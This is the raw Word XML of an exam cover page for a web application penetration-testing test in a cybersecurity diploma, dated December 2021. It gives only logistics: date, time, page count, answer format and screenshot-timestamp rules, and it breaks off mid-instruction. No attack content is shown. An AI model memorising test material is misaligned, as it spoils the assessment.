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3"/>
        <w:gridCol w:w="2734"/>
      </w:tblGrid>
      <w:tr w:rsidR="00066F38" w:rsidRPr="00487BD5" w14:paraId="0D9F137B" w14:textId="77777777" w:rsidTr="00287532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3484" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5E0F49B7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bookmarkStart w:id="0" w:name="_Hlk484564084"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidRPr="00487BD5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1516" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0B8BCF5F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066F38" w:rsidRPr="00487BD5" w14:paraId="7570B891" w14:textId="77777777" w:rsidTr="00287532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3484" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2ABB105B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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1516" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="656F2F26" w14:textId="77777777" w:rsidR="00066F38" w:rsidRPr="00487BD5" w:rsidRDefault="00066F38" w:rsidP="00B264A1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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="137DD98A" w14:textId="77777777" w:rsidR="00066F38" w:rsidRDefault="00066F38" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B952070" w14:textId="41F5F326" w:rsidR="00091F75" w:rsidRDefault="00091F75" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E7244A4" wp14:editId="60C02C48">
            <wp:extent cx="3048000" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2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2A19" w14:textId="77777777" w:rsidR="00091F75" w:rsidRDefault="00091F75" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/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7FDF0E1" w14:textId="3B412D45" w:rsidR="00091F75" w:rsidRPr="00EC6CEF" w:rsidRDefault="009C67E1" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333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EC6CEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Web Application Pen-Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040E9B85" w14:textId="31A7EE66" w:rsidR="00091F75" w:rsidRPr="005330E9" w:rsidRDefault="007D303F" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-3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r </w:t>
      </w:r>
      <w:r w:rsidR="003C4DC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00091F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (20</w:t>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00330284">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00091F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00330284">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00D80E05">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), Semester </w:t>
      </w:r>
      <w:r w:rsidR="003C4DC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F70DE23" w14:textId="77777777" w:rsidR="00091F75" w:rsidRPr="005330E9" w:rsidRDefault="00091F75" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633F7C7C" w14:textId="54E068C6" w:rsidR="00091F75" w:rsidRPr="00D61E0C" w:rsidRDefault="001A4122" w:rsidP="00AD7FED">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:right="-333"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A4122">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>School of InfoComm Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15978514" w14:textId="03955FFB" w:rsidR="00D80E05" w:rsidRDefault="00D80E05" w:rsidP="00091F75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  <w:r w:rsidRPr="00D80E05">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diploma in </w:t>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cybers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r w:rsidR="009564C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009152A8" w14:textId="326234B6" w:rsidR="003C4DC9" w:rsidRPr="001A4122" w:rsidRDefault="003C4DC9" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D9168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5342E13C" w14:textId="77777777" w:rsidR="00091F75" w:rsidRDefault="00091F75" w:rsidP="00091F75">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C795AF" w14:textId="7F24298B" w:rsidR="00091F75" w:rsidRPr="00D31B2E" w:rsidRDefault="004F1AC5" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333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COMMON </w:t>
      </w:r>
      <w:r w:rsidR="00091F75" w:rsidRPr="00D31B2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B00E9E" w14:textId="77777777" w:rsidR="00184463" w:rsidRDefault="00184463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11BE03F1" w14:textId="77777777" w:rsidR="009B26CE" w:rsidRPr="005330E9" w:rsidRDefault="009B26CE" w:rsidP="00091F75">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A9ECAC" w14:textId="2CD659A7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4753E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4753E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EB4705">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00B3417F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C4DC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>December</w:t>
      </w:r>
      <w:r w:rsidR="00C23873">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EB4705">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EF614F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thursday</w:t>
      </w:r>
      <w:r w:rsidR="007D303F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE95E33" w14:textId="442CC4A2" w:rsidR="00091F75" w:rsidRPr="00B4753E" w:rsidRDefault="00091F75" w:rsidP="00091F75">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
          <w:tab w:val="left" w:pos="3060"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:right="-333"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4753E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Time:   </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4753E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00823A08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00182CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="004B4F0B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841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00880F27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="004B4F0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00182CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00823A08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00182CAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A97A46">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00880F27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00841274">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00880F27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF8A97" w14:textId="77777777" w:rsidR="00091F75" w:rsidRPr="004721DE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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004721DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04A84F" w14:textId="77777777" w:rsidR="00091F75" w:rsidRPr="00801A2B" w:rsidRDefault="00091F75" w:rsidP="00091F75">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
          <w:tab w:val="left" w:pos="3060"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="720" w:right="-693"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB9B64A" w14:textId="77777777" w:rsidR="00091F75" w:rsidRPr="00FF68EF" w:rsidRDefault="00091F75" w:rsidP="00544D47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:right="27"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF68EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>INSTRUCTIONS TO CANDIDATES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72931BAF" w14:textId="77777777" w:rsidR="00091F75" w:rsidRPr="005330E9" w:rsidRDefault="00091F75" w:rsidP="00544D47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="720" w:right="27"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1099EA82" w14:textId="70159547" w:rsidR="00091F75" w:rsidRPr="008564F4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8564F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Write your Student Number, Name, Module Group and Seat Number </w:t>
      </w:r>
      <w:r w:rsidRPr="008564F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CLEARLY</w:t>
      </w:r>
      <w:r w:rsidRPr="008564F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidR="00433E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>boxes provided above</w:t>
      </w:r>
      <w:r w:rsidRPr="008564F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC64049" w14:textId="77777777" w:rsidR="00091F75" w:rsidRPr="008564F4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  <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9D2029" w14:textId="3B6ACB1A" w:rsidR="00091F75" w:rsidRPr="00FF68EF" w:rsidRDefault="00091F75" w:rsidP="00544D47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  <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF68EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This paper consists of </w:t>
      </w:r>
      <w:r w:rsidR="00420F4B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="000741AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF68EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pages including this cover page. Check carefully to make sure your set is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7B79C" w14:textId="77777777" w:rsidR="00091F75" w:rsidRPr="00F36A2D" w:rsidRDefault="00091F75" w:rsidP="00544D47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="720" w:right="27" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73600500" w14:textId="578A4997" w:rsidR="000E6DAB" w:rsidRPr="00F36A2D" w:rsidRDefault="000E6DAB" w:rsidP="000E6DAB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 w:rsidRPr="00F36A2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer </w:t>
      </w:r>
      <w:r w:rsidRPr="004020FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36A2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> questions.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36A2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B73E6" w14:textId="2B7A0417" w:rsidR="00A241FD" w:rsidRDefault="00933446" w:rsidP="00A241FD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</w:t>
      </w:r>
      <w:r w:rsidR="00782424" w:rsidRPr="00782424">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> your answers </w:t>
      </w:r>
      <w:r w:rsidR="003952F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="003952F0" w:rsidRPr="00287532">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>BLUE</w:t>
      </w:r>
      <w:r w:rsidR="003952F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below </w:t>
      </w:r>
      <w:r w:rsidR="00BD2EB9" w:rsidRPr="00782424">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>eac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00BD2EB9" w:rsidRPr="00782424">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> question in this paper</w:t>
      </w:r>
      <w:r w:rsidR="00BD2EB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBAF6A" w14:textId="77777777" w:rsidR="00A241FD" w:rsidRDefault="00A241FD" w:rsidP="00A241FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="27"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6729AD88" w14:textId="0361E56E" w:rsidR="00087907" w:rsidRPr="00882079" w:rsidRDefault="00464CBA" w:rsidP="002F6CDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1275"/>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="27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l</w:t>
      </w:r>
      <w:r w:rsidR="00132C45" w:rsidRPr="00882079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> screenshots must show the Host OS (Windows 10) Current Date &amp; Time. </w:t>
      </w:r>
      <w:r w:rsidR="009035C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>This would prove the screenshots are taken during th</w:t>
      </w:r>
      <w:r w:rsidR="00333604">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="009035C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> test and not </w:t>
      </w:r>
      <w:r w:rsidR="00333604">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">prior to this test. </w:t>
      </w:r>
      <w:r w:rsidR="00882079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="00132C45" w:rsidRPr="00882079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> “Print Screen” </w:t>
      </w:r>
